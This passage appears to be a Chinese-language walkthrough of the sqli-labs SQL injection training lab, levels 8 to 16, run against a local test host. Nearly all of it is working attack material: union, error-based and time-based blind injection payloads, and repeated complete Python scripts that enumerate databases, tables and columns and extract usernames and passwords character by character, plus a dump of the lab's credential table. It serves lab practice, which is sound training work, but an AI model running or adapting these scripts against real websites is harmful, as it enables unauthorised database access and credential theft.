get_table_name_length(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的每张表名的长度
get_table_name(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的所有表名
get_column_name(get_column_name_count()) #爆破当前数据库下的users表的所有字段个数、爆破当前数据库下的users表的所有字段名
get_username(get_users_count()) #爆破当前users表有多少条数据记录、爆破当前数据库中users表中的username字段和password的字段内容
Less-8:
判断注入点:
'
可以尝试注入的有:
' or 1=1--+
使用python爆破:
import requests
import time
# 模拟请求的一个库:
r = requests.session()
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='
# 爆破当前数据库名长度:
def get_database_name_length() -> int:
print("===========正在爆破当前数据库名长度!!!================")
print("================请耐心等待!!!======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = "http://192.168.0.128:9020/Less-8/?id=-1' or length(database())={} and sleep(0.1) --+".format(i)
start_time = time.time() # 这是请求前的时间
r.get(url) # 这是请求之后
if time.time() - start_time > 1: #当请求时间大于1秒的时候就说明数据库长度爆破成功!
length = i
break
print("============="+"当前数据库的长度为:{}".format(i))
print("")
print("")
return length
#爆破当前数据库名称:
def get_database_name(length):
print("===========正在爆破当前数据库名!!!====================")
print("================请耐心等待!!!=======================")
database_name = ''
for i in range(length+1): # 因为包含左不包含右,要想取到count就得+1
for j in range(1,128): #ascii码一共1~127,包含左不包含右,因此+1为128
url = "http://192.168.0.128:9020/Less-8/?id=-1' or ascii(mid(database(),{},1))={} and sleep(0.1) --+".format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
database_name = database_name+chr(j)
print(database_name)
break
print("============="+"当前数据库名为:"+database_name)
print("")
print("")
return database_name
#爆破当前数据库下的表个数:
def get_table_name_count() -> int:
print("=========正在爆破当前数据库下的表个数!!!===============")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = "http://192.168.0.128:9020/Less-8/?id=-1' or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) --+".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
count = i
break
print("============="+"当前数据库下的数据表的个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的每张表名的长度:
def get_table_name_length(count):
print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(count):
for j in range(50):
url = "http://192.168.0.128:9020/Less-8/?id=-1' or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) --+".format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
length = j
break
print("第{}张表的长度为:".format(i+1)+str(length))
print("=========以上为当前数据库下的每张表名的长度")
print("")
print("")
return 0
#爆破当前数据库下的所有数据表名:
def get_table_name(count):
print("=========正在爆破当前数据库下的所有表名!!!=========")
print("================请耐心等待!!!=======================")
table_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = "http://192.168.0.128:9020/Less-8/?id=-1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) --+".format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
table_name += chr(k)
print(table_name)
break
print("第{}张数据表名为:".format(i+1)+table_name)
table_name=''
print("=========以上为当前数据库下的所有数据表名")
print("")
print("")
return 0
#爆破当前数据库下的users表的所有字段个数:
def get_column_name_count() -> int:
print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
url = "http://192.168.0.128:9020/Less-8/?id=-1' or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={} and sleep(0.1) --+".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的users表的所有字段名:
def get_column_name(count):
print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
print("================请耐心等待!!!=======================")
print("")
print("")
column_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = "http://192.168.0.128:9020/Less-8/?id=-1' or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {},1),{},1))={} and sleep(0.1) --+".format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
column_name += chr(k)
print(column_name)
break
print("第{}个字段名为:".format(i + 1) + column_name)
column_name = ''
print("=========以上为当前数据库下的users表的所有字段名")
print("")
print("")
return 0
# 爆破当前users表有多少条数据记录:
def get_users_count() -> int:
print("======正在爆破当前users表有多少条数据记录!!!=======")
print("================请耐心等待!!!=======================")
for i in range(100):
url = "http://192.168.0.128:9020/Less-8/?id=-1' or (select count(*) from users )={} and sleep(0.1) --+".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前users表有{}条数据记录".format(count))
print("")
print("")
return count
#爆破当前数据库中users表中的username字段和password的字段内容:
def get_username(count):
print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
print("=============================请耐心等待!!!===============================")
values = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url1 = "http://192.168.0.128:9020/Less-8/?id=-1' or ascii(substr((select concat(id,'---',username,'---',password) from users limit {},1),{},1))={} and sleep(0.1) --+".format(i,j,k)
# 此处的id,useranme,password以' - '分隔!
start_time = time.time()
r.get(url1)
if time.time() - start_time >1:
values += chr(k)
print(values)
break
print("===第{}条记录的id值为:".format(i+1)+values)
values = ''
print("=====以上为users表中所有数据========")
print("")
print("")
return 0
# 调用以上函数:
if __name__ == '__main__':
get_database_name(get_database_name_length()) #获取当前数据库名长度、获取当前数据库名
get_table_name_length(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的每张表名的长度
get_table_name(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的所有表名
get_column_name(get_column_name_count()) #爆破当前数据库下的users表的所有字段个数、爆破当前数据库下的users表的所有字段名
get_username(get_users_count()) #爆破当前users表有多少条数据记录、爆破当前数据库中users表中的username字段和password的字段内容
Less-9:
判断注入点:
-1' or sleep(1)--+
发现可以时间注入(有时间延迟)
使用python爆破:
import requests
import time
# 模拟请求的一个库:
r = requests.session()
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='
# 爆破当前数据库名长度:
def get_database_name_length() -> int:
print("===========正在爆破当前数据库名长度!!!================")
print("================请耐心等待!!!======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = "http://192.168.0.128:9020/Less-9/?id=-1' or length(database())={} and sleep(0.1)--+".format(i)
start_time = time.time() # 这是请求前的时间
r.get(url) # 这是请求之后
if time.time() - start_time > 1: #当请求时间大于1秒的时候就说明数据库长度爆破成功!
length = i
break
print("============="+"当前数据库的长度为:{}".format(i))
print("")
print("")
return length
#爆破当前数据库名称:
def get_database_name(length):
print("===========正在爆破当前数据库名!!!====================")
print("================请耐心等待!!!=======================")
database_name = ''
for i in range(length+1): # 因为包含左不包含右,要想取到count就得+1
for j in range(1,128): #ascii码一共1~127,包含左不包含右,因此+1为128
url = "http://192.168.0.128:9020/Less-9/?id=-1' or ascii(substr((database()),{},1))={} and sleep(0.1)--+".format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
database_name = database_name+chr(j)
print(database_name)
break
print("============="+"当前数据库名为:"+database_name)
print("")
print("")
return database_name
#爆破当前数据库下的表个数:
def get_table_name_count() -> int:
print("=========正在爆破当前数据库下的表个数!!!===============")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = "http://192.168.0.128:9020/Less-9/?id=-1' or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) --+".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
count = i
break
print("============="+"当前数据库下的数据表的个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的每张表名的长度:
def get_table_name_length(count):
print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(count):
for j in range(50):
url = "http://192.168.0.128:9020/Less-9/?id=-1' or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) --+".format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
length = j
break
print("第{}张表的长度为:".format(i+1)+str(length))
print("=========以上为当前数据库下的每张表名的长度")
print("")
print("")
return 0
#爆破当前数据库下的所有数据表名:
def get_table_name(count):
print("=========正在爆破当前数据库下的所有表名!!!=========")
print("================请耐心等待!!!=======================")
table_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = "http://192.168.0.128:9020/Less-9/?id=-1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) --+".format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
table_name += chr(k)
print(table_name)
break
print("第{}张数据表名为:".format(i+1)+table_name)
table_name=''
print("=========以上为当前数据库下的所有数据表名")
print("")
print("")
return 0
#爆破当前数据库下的users表的所有字段个数:
def get_column_name_count() -> int:
print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
url = "http://192.168.0.128:9020/Less-9/?id=-1' or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={} and sleep(0.1) --+".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的users表的所有字段名:
def get_column_name(count):
print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
print("================请耐心等待!!!=======================")
print("")
print("")
column_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = "http://192.168.0.128:9020/Less-9/?id=-1' or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {},1),{},1))={} and sleep(0.1) --+".format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
column_name += chr(k)
print(column_name)
break
print("第{}个字段名为:".format(i + 1) + column_name)
column_name = ''
print("=========以上为当前数据库下的users表的所有字段名")
print("")
print("")
return 0
# 爆破当前users表有多少条数据记录:
def get_users_count() -> int:
print("======正在爆破当前users表有多少条数据记录!!!=======")
print("================请耐心等待!!!=======================")
for i in range(100):
url = "http://192.168.0.128:9020/Less-9/?id=-1' or (select count(*) from users )={} and sleep(0.1) --+".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前users表有{}条数据记录".format(count))
print("")
print("")
return count
#爆破当前数据库中users表中的username字段和password的字段内容:
def get_username(count):
print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
print("=============================请耐心等待!!!===============================")
values = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url1 = "http://192.168.0.128:9020/Less-9/?id=-1' or ascii(substr((select concat(id,'---',username,'---',password) from users limit {},1),{},1))={} and sleep(0.1) --+".format(i,j,k)
# 此处的id,useranme,password以' - '分隔!
start_time = time.time()
r.get(url1)
if time.time() - start_time >1:
values += chr(k)
print(values)
break
print("===第{}条记录的id值为:".format(i+1)+values)
values = ''
print("=====以上为users表中所有数据========")
print("")
print("")
return 0
# 调用以上函数:
if __name__ == '__main__':
get_database_name(get_database_name_length()) #获取当前数据库名长度、获取当前数据库名长度
get_table_name_length(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的每张表名的长度
get_table_name(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的所有表名
get_column_name(get_column_name_count()) #爆破当前数据库下的users表的所有字段个数、爆破当前数据库下的users表的所有字段名
get_username(get_users_count()) #爆破当前users表有多少条数据记录、爆破当前数据库中users表中的username字段和password的字段内容
Less-10:
判断注入点:
-1" or sleep(1)--+
判断得出是可以通过时间注入
使用python脚本爆破:
import requests
import time
# 模拟请求的一个库:
r = requests.session()
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='
# 爆破当前数据库名长度:
def get_database_name_length() -> int:
print("===========正在爆破当前数据库名长度!!!================")
print("================请耐心等待!!!======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = 'http://192.168.0.128:9020/Less-10/?id=-1" or length(database())={} and sleep(0.1)--+'.format(i)
start_time = time.time() # 这是请求前的时间
r.get(url) # 这是请求之后
if time.time() - start_time > 1: #当请求时间大于1秒的时候就说明数据库长度爆破成功!
length = i
break
print("============="+"当前数据库的长度为:{}".format(i))
print("")
print("")
return length
#爆破当前数据库名称:
def get_database_name(length):
print("===========正在爆破当前数据库名!!!====================")
print("================请耐心等待!!!=======================")
database_name = ''
for i in range(length+1): # 因为包含左不包含右,要想取到count就得+1
for j in range(1,128): #ascii码一共1~127,包含左不包含右,因此+1为128
url = 'http://192.168.0.128:9020/Less-10/?id=-1" or ascii(substr((database()),{},1))={} and sleep(0.1)--+'.format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
database_name = database_name+chr(j)
print(database_name)
break
print("============="+"当前数据库名为:"+database_name)
print("")
print("")
return database_name
#爆破当前数据库下的表个数:
def get_table_name_count() -> int:
print("=========正在爆破当前数据库下的表个数!!!===============")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = 'http://192.168.0.128:9020/Less-10/?id=-1" or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) --+'.format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
count = i
break
print("============="+"当前数据库下的数据表的个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的每张表名的长度:
def get_table_name_length(count):
print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(count):
for j in range(50):
url = 'http://192.168.0.128:9020/Less-10/?id=-1" or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) --+'.format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
length = j
break
print("第{}张表的长度为:".format(i+1)+str(length))
print("=========以上为当前数据库下的每张表名的长度")
print("")
print("")
return 0
#爆破当前数据库下的所有数据表名:
def get_table_name(count):
print("=========正在爆破当前数据库下的所有表名!!!=========")
print("================请耐心等待!!!=======================")
table_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = 'http://192.168.0.128:9020/Less-10/?id=-1" or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) --+'.format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
table_name += chr(k)
print(table_name)
break
print("第{}张数据表名为:".format(i+1)+table_name)
table_name=''
print("=========以上为当前数据库下的所有数据表名")
print("")
print("")
return 0
#爆破当前数据库下的users表的所有字段个数:
def get_column_name_count() -> int:
print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
url = 'http://192.168.0.128:9020/Less-10/?id=-1" or (select count(column_name) from information_schema.columns where table_schema=database() and table_name="users")={} and sleep(0.1) --+'.format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的users表的所有字段名:
def get_column_name(count):
print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
print("================请耐心等待!!!=======================")
print("")
print("")
column_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = 'http://192.168.0.128:9020/Less-10/?id=-1" or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit {},1),{},1))={} and sleep(0.1) --+'.format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
column_name += chr(k)
print(column_name)
break
print("第{}个字段名为:".format(i + 1) + column_name)
column_name = ''
print("=========以上为当前数据库下的users表的所有字段名")
print("")
print("")
return 0
# 爆破当前users表有多少条数据记录:
def get_users_count() -> int:
print("======正在爆破当前users表有多少条数据记录!!!=======")
print("================请耐心等待!!!=======================")
for i in range(100):
url = 'http://192.168.0.128:9020/Less-10/?id=-1" or (select count(*) from users )={} and sleep(0.1) --+'.format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前users表有{}条数据记录".format(count))
print("")
print("")
return count
#爆破当前数据库中users表中的username字段和password的字段内容:
def get_username(count):
print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
print("=============================请耐心等待!!!===============================")
values = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url1 = 'http://192.168.0.128:9020/Less-10/?id=-1" or ascii(substr((select concat(id,"---",username,"---",password) from users limit {},1),{},1))={} and sleep(0.1) --+'.format(i,j,k)
# 此处的id,useranme,password以' - '分隔!
start_time = time.time()
r.get(url1)
if time.time() - start_time >1:
values += chr(k)
print(values)
break
print("===第{}条记录的id值为:".format(i+1)+values)
values = ''
print("=====以上为users表中所有数据========")
print("")
print("")
return 0
# 调用以上函数:
if __name__ == '__main__':
get_database_name(get_database_name_length()) #获取当前数据库名长度、获取当前数据库名长度
get_table_name_length(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的每张表名的长度
get_table_name(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的所有表名
get_column_name(get_column_name_count()) #爆破当前数据库下的users表的所有字段个数、爆破当前数据库下的users表的所有字段名
get_username(get_users_count()) #爆破当前users表有多少条数据记录、爆破当前数据库中users表中的username字段和password的字段内容
Less-11:
判断注入点:
'
单引号闭合的
POST请求(表单)
使用union联合注入:
' or 1=1 #
使用order by判断字段个数:
' order by 1 #
依次测试:
' order by 3 #
在测试第三个字段时返回Unknown column '3' in 'order clause'
说明这个表的字段有2个
使用union联合注入:
' union select 1,2 #
有回显1,2
爆所有数据库:
' union select group_concat(schema_name),database() from information_schema.schemata #
所有数据库名:
information_schema,challenges,mysql,performance_schema,security
当前数据库为:
security
爆当前数据库名及当前数据库的所有数据表:
' union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #
当前数据库下所有数据表:
emails,referers,uagents,users
爆users表的所有列名(字段名):
' union select group_concat(column_name),2 from information_schema.columns where table_name='users' #
users的所有字段名为:
id,username,password
爆数据:
' union select group_concat(username,' ',password),2 from users #
Dumb Dumb,
Angelina I-kill-you,
Dummy p@ssword,
secure crappy,
stupid stupidity,
superman genious,
batman mob!le,
admin admin,
admin1 admin1,
admin2 admin2,
admin3 admin3,
dhakkan dumbo,
admin4 admin4
Less-12:
判断注入点:
输入”:
"
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""") and password=("") LIMIT 0,1' at line 1
发现闭合方式是:")
再次尝试注入:
1") or 1=1 #
判断字段数:
") order by 1#
再次尝试:
") order by 3#
提示:Unknown column '3' in 'order clause'
说明字段数为2
使用union联合注入:
") union select 1,2#
爆所有数据库:
") union select group_concat(schema_name),database() from information_schema.schemata #
爆当前数据库名及当前数据库的所有数据表:
") union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #
爆users表的所有列名(字段名):
") union select group_concat(column_name),2 from information_schema.columns where table_name='users' #
爆数据:
") union select group_concat(username,' ',password),2 from users #
Less-13:
判断注入点:
输入'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') and password=('') LIMIT 0,1' at line 1
发现是')闭合
尝试万能密码:
1') or 1=1#
提示:成功登录
但无回显就不能使用union联合注入
使用报错注入:
使用floor注入:
1') or 1= (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) #
1') or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #
重复注入:
1') or (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x) #
extractvalue注入:
1') or (select extractvalue(1,concat(0x7e,(select database()),0x7e))) #
Less-14:
判断注入点:
输入"
"
报错信息:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""" and password="" LIMIT 0,1' at line 1
判断双引号闭合
1" or 1=1#
发现成功登录,但无回显(不能使用union联合注入)
使用报错注入:
floor注入:
1" or 1= (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) #
updatexml报错注入:
1" or (select updatexml(1,concat(0x7e,(select database())),1)) #
1" or (select updatexml(1,concat(0x7e,(select concat(username,'-',password) from users limit 0,1)),1)) #
double 数值类型超出范围进行报错注入:
1" or (select (exp(~(select * from (select database())a)))) #
bigint 溢出进行报错注入:
1" or (select (!(select * from (select user())x) - ~0)) #
geometrycollection():
1" or (geometrycollection((select * from (select * from (select user())a)b))) #
multipoint():
1" or (multipoint((select * from (select * from (select user())a)b))) #
Less-15:
判断注入点:
注入点是'单引号
输入时间注入函数:
1' or 1=sleep(1)#
存在时间注入
判断数据库长度:
1' or length(database())>1 and sleep(1)#
使用python脚本爆破:
import requests
import time
# 模拟请求的一个库:
url = "http://192.168.0.128:9020/Less-15/"
# 爆破当前数据库名长度:
def get_database_name_length() -> int:
print("===========正在爆破当前数据库名长度!!!================")
print("================请耐心等待!!!======================")
print("")
print("")
for i in range(50):
#关键代码payload:
payload = "1' or length(database())={} and sleep(0.1)#".format(i)
param = {"uname": payload, "passwd": ""}
start_time = time.time() # 这是请求前的时间
requests.post(url, data=param)
if time.time() - start_time > 1: #当请求时间大于1秒的时候就说明数据库长度爆破成功!
length = i
break
print("============="+"当前数据库的长度为:{}".format(i))
print("")
print("")
return length
#爆破当前数据库名称:
def get_database_name(length):
print("===========正在爆破当前数据库名!!!====================")
print("================请耐心等待!!!=======================")
database_name = ''
for i in range(length+1): # 因为包含左不包含右,要想取到count就得+1
for j in range(1,128): #ascii码一共1~127,包含左不包含右,因此+1为128
payload = "1' or ascii(substr(database(),{},1))={} and sleep(0.1)#".format(i,j)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time >1:
database_name = database_name+chr(j)
print(database_name)
break
print("============="+"当前数据库名为:"+database_name)
print("")
print("")
return database_name
#爆破当前数据库下的表个数:
def get_table_name_count() -> int:
print("=========正在爆破当前数据库下的表个数!!!===============")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
payload = "1' or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1)#".format(i)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time > 1:
count = i
break
print("============="+"当前数据库下的数据表的个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的每张表名的长度:
def get_table_name_length(count):
print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(count):
for j in range(50):
payload = "1' or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1)#".format(i,j)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time > 1:
length = j
break
print("第{}张表的长度为:".format(i+1)+str(length))
print("=========以上为当前数据库下的每张表名的长度")
print("")
print("")
return 0
#爆破当前数据库下的所有数据表名:
def get_table_name(count):
print("=========正在爆破当前数据库下的所有表名!!!=========")
print("================请耐心等待!!!=======================")
table_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
payload = "1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1)#".format(i,j,k)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time > 1:
table_name += chr(k)
print(table_name)
break
print("第{}张数据表名为:".format(i+1)+table_name)
table_name=''
print("=========以上为当前数据库下的所有数据表名")
print("")
print("")
return 0
#爆破当前数据库下的users表的所有字段个数:
def get_column_name_count() -> int:
print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
payload = "1' or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={} and sleep(0.1)#".format(i)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的users表的所有字段名:
def get_column_name(count):
print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
print("================请耐心等待!!!=======================")
print("")
print("")
column_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
payload = "1' or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {},1),{},1))={} and sleep(0.1)#".format(i,j,k)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time > 1:
column_name += chr(k)
print(column_name)
break
print("第{}个字段名为:".format(i + 1) + column_name)
column_name = ''
print("=========以上为当前数据库下的users表的所有字段名")
print("")
print("")
return 0
# 爆破当前users表有多少条数据记录:
def get_users_count() -> int:
print("======正在爆破当前users表有多少条数据记录!!!=======")
print("================请耐心等待!!!=======================")
for i in range(100):
payload = "1' or (select count(*) from users )={} and sleep(0.1)#".format(i)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前users表有{}条数据记录".format(count))
print("")
print("")
return count
#爆破当前数据库中users表中的username字段和password的字段内容:
def get_username(count):
print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
print("=============================请耐心等待!!!===============================")
values = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
payload = "1' or ascii(substr((select concat(id,'---',username,'---',password) from users limit {},1),{},1))={} and sleep(0.1)#".format(i,j,k)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time >1:
values += chr(k)
print(values)
break
print("===第{}条记录的id值为:".format(i+1)+values)
values = ''
print("=====以上为users表中所有数据========")
print("")
print("")
return 0
# 调用以上函数:
if __name__ == '__main__':
get_database_name(get_database_name_length()) #获取当前数据库名长度、获取当前数据库名长度
get_table_name_length(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的每张表名的长度
get_table_name(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的所有表名
get_column_name(get_column_name_count()) #爆破当前数据库下的users表的所有字段个数、爆破当前数据库下的users表的所有字段名
get_username(get_users_count()) #爆破当前users表有多少条数据记录、爆破当前数据库中users表中的username字段和password的字段内容
Less-16:
判断注入点:
注入点为:")
1") or 1=sleep(1)#
使用python脚本爆破:
import requests
import time
# 模拟请求的一个库:
url = "http://192.168.0.128:9020/Less-16/"
# 爆破当前数据库名长度:
def get_database_name_length() -> int:
print("===========正在爆破当前数据库名长度!!!================")
print("================请耐心等待!!!======================")
print("")
print("")
for i in range(50):
#关键代码payload:
payload = '1") or length(database())={} and sleep(0.1)#'.format(i)
param = {"uname": payload, "passwd": ""}
start_time = time.time() # 这是请求前的时间
requests.post(url, data=param)
if time.time() - start_time > 1: #当请求时间大于1秒的时候就说明数据库长度爆破成功!
length = i
break
print("============="+"当前数据库的长度为:{}".format(i))
print("")
print("")
return length
#爆破当前数据库名称:
def get_database_name(length):
print("===========正在爆破当前数据库名!!!====================")
print("================请耐心等待!!!=======================")
database_name = ''
for i in range(length+1): # 因为包含左不包含右,要想取到count就得+1
for j in range(1,128): #ascii码一共1~127,包含左不包含右,因此+1为128
payload = '1") or ascii(substr(database(),{},1))={} and sleep(0.1)#'.format(i,j)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time >1:
database_name = database_name+chr(j)
print(database_name)
break
print("============="+"当前数据库名为:"+database_name)
print("")
print("")
return database_name
#爆破当前数据库下的表个数:
def get_table_name_count() -> int:
print("=========正在爆破当前数据库下的表个数!!!===============")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
payload = '1") or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1)#'.format(i)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time > 1:
count = i
break
print("============="+"当前数据库下的数据表的个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的每张表名的长度:
def get_table_name_length(count):
print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(count):
for j in range(50):
payload = '1") or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1)#'.format(i,j)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time > 1:
length = j
break
print("第{}张表的长度为:".format(i+1)+str(length))
print("=========以上为当前数据库下的每张表名的长度")
print("")
print("")
return 0
#爆破当前数据库下的所有数据表名:
def get_table_name(count):
print("=========正在爆破当前数据库下的所有表名!!!=========")
print("================请耐心等待!!!=======================")
table_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
payload = '1") or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1)#'.format(i,j,k)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time > 1:
table_name += chr(k)
print(table_name)
break
print("第{}张数据表名为:".format(i+1)+table_name)
table_name=''
print("=========以上为当前数据库下的所有数据表名")
print("")
print("")
return 0
#爆破当前数据库下的users表的所有字段个数:
def get_column_name_count() -> int:
print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
print("================请耐心等待!!!=======================")
print("")
